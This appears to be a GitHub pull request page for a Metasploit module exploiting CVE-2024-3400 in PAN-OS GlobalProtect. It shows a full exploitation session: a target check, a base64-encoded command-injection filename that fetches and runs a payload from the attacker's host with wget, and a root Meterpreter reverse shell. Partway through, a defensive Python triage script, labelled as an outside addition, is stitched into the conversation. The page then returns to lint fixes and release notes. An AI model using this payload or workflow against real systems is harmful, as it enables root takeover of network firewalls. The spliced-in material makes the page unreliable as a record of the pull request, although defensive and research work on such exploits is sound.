
Exploit module for CVE-2024-3400 - Palo Alto Networks PAN-OS #19101

Merged
10 commits merged into from Apr 19, 2024

Conversation

remmons-r7
Contributor

@remmons-r7 remmons-r7 commented Apr 17, 2024

This pull request is an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

Example usage:

msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options

Module options (exploit/linux/http/panos_telemetry_cmd_exec):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443                        yes       The target port (TCP)
   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
   VHOST                                 no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ugVfXWRxV        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
RHOSTS => 192.168.50.226
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
LHOST => 192.168.50.25
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
LPORT => 8585
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.50.25:8585 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target

meterpreter > getuid 
Server username: root
meterpreter > sysinfo 
Computer     : 192.168.50.216
OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Thank you!
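The module output above leaves two host-side artifacts that a defender can look for after a suspected CVE-2024-3400 attempt: a telemetry session filename under /opt/panlogs/tmp/device_telemetry/minute/ built from shell metacharacters, and a glyphicons-*-regular.woff2 file that the check writes into /var/appweb/sslvpndocs/global-protect/portal/fonts/ and, as the output notes, does not delete. The following Python script is an added triage example, not code from this pull request or from the Metasploit project. The directory paths come from the module output; the sample listing is constructed, and the set of legitimately shipped glyphicons segments ("halflings") is an assumption that should be confirmed against a known-clean appliance.

```python
import re

# Directories taken from the module output quoted in the pull request.
TELEMETRY_MINUTE_DIR = "/opt/panlogs/tmp/device_telemetry/minute"
PORTAL_FONTS_DIR = "/var/appweb/sslvpndocs/global-protect/portal/fonts"

# A telemetry session filename is expected to be plain alphanumerics. Shell
# metacharacters (backticks, $-expansions such as ${IFS}, pipes) indicate a
# name that was crafted to be interpreted by a shell.
SHELL_META_RE = re.compile(r"[`$|;&<>(){}\\'\"]")

# The module's check writes glyphicons-<random letters>-regular.woff2 into the
# portal fonts directory and leaves it there.
# ASSUMPTION: "halflings" is the only segment a stock portal ships with; verify
# this set against a known-clean appliance before relying on it.
GLYPHICONS_RE = re.compile(r"^glyphicons-([A-Za-z0-9]+)-regular\.woff2$")
KNOWN_GLYPHICON_SEGMENTS = {"halflings"}


def is_suspicious_telemetry_name(name: str) -> bool:
    """True if a telemetry session filename contains shell metacharacters."""
    return SHELL_META_RE.search(name) is not None


def is_suspicious_font_name(name: str) -> bool:
    """True if a font filename looks like a check-mode artifact."""
    match = GLYPHICONS_RE.match(name)
    return match is not None and match.group(1) not in KNOWN_GLYPHICON_SEGMENTS


def triage_listing(listing):
    """Take (directory, filename) pairs, return (path, reason) findings."""
    findings = []
    for directory, name in listing:
        path = f"{directory}/{name}"
        if directory == TELEMETRY_MINUTE_DIR and is_suspicious_telemetry_name(name):
            findings.append((path, "shell metacharacters in telemetry session filename"))
        elif directory == PORTAL_FONTS_DIR and is_suspicious_font_name(name):
            findings.append((path, "unexpected glyphicons font file left by a vulnerability check"))
    return findings


# Constructed sample listing; these are not entries from a real appliance.
SAMPLE_LISTING = [
    (TELEMETRY_MINUTE_DIR, "f3a9c1d2e4b5"),
    (TELEMETRY_MINUTE_DIR, "lyne`echo${IFS}QUJD|base64${IFS}-d`"),
    (PORTAL_FONTS_DIR, "glyphicons-halflings-regular.woff2"),
    (PORTAL_FONTS_DIR, "glyphicons-ipteqmbl-regular.woff2"),
]

if __name__ == "__main__":
    for path, reason in triage_listing(SAMPLE_LISTING):
        print(f"[!] {path}: {reason}")
```

Feed the script a listing gathered from the appliance (for example the output of a recursive directory walk of the two paths) rather than the constructed sample; because the telemetry service may not run the injected name for up to an hour, a crafted session file can be present before any session or outbound connection is seen, so the filename check is the earlier of the two signals.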

remmons-r7 and others added 4 commits April 17, 2024 13:52
Fixes for the following:
W: 80:  5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res_create_file. Did you mean res_check_created?
C: 90: 81: [Correctable] Style/TrailingCommaInArguments: Avoid comma after the last parameter of a method call.
C: 93:  8: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 93: 42: [Correctable] Style/AndOr: Use && instead of and.
C: 93: 46: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 94: 43: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:100: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:131: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
W:117:  5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res.
@smcintyre-r7 smcintyre-r7 added the labels module, hotness (Something we're really excited about), needs-docs and rn-modules (release notes for new or majorly enhanced modules) Apr 17, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 self-assigned this Apr 18, 2024
@remmons-r7 remmons-r7 marked this pull request as draft April 18, 2024 16:22
remmons-r7 and others added 2 commits April 18, 2024 18:21
C:132: 20: [Correctable] Layout/SpaceAroundBlockParameters: Space before first block parameter detected.
C:132: 30: [Correctable] Layout/SpaceAroundBlockParameters: Space after last block parameter detected.
C:133:  5: [Correctable] Layout/IndentationWidth: Use 2 (not 4) spaces for indentation.
C:143:  4: [Correctable] Layout/TrailingEmptyLines: Final newline missing.
@remmons-r7 remmons-r7 marked this pull request as ready for review April 18, 2024 23:36
@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in 4733d1d Apr 19, 2024
@bwatters-r7
Contributor

bwatters-r7 commented Apr 19, 2024

Release Notes

This adds an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

@wvu
Contributor

wvu commented Apr 22, 2024

Hey, can we fix the CVE in the title? Thanks!

@bwatters-r7 bwatters-r7 changed the title from "Exploit module for CVE-2024-4300 - Palo Alto Networks PAN-OS" to "Exploit module for CVE-2024-3400 - Palo Alto Networks PAN-OS" Apr 22, 2024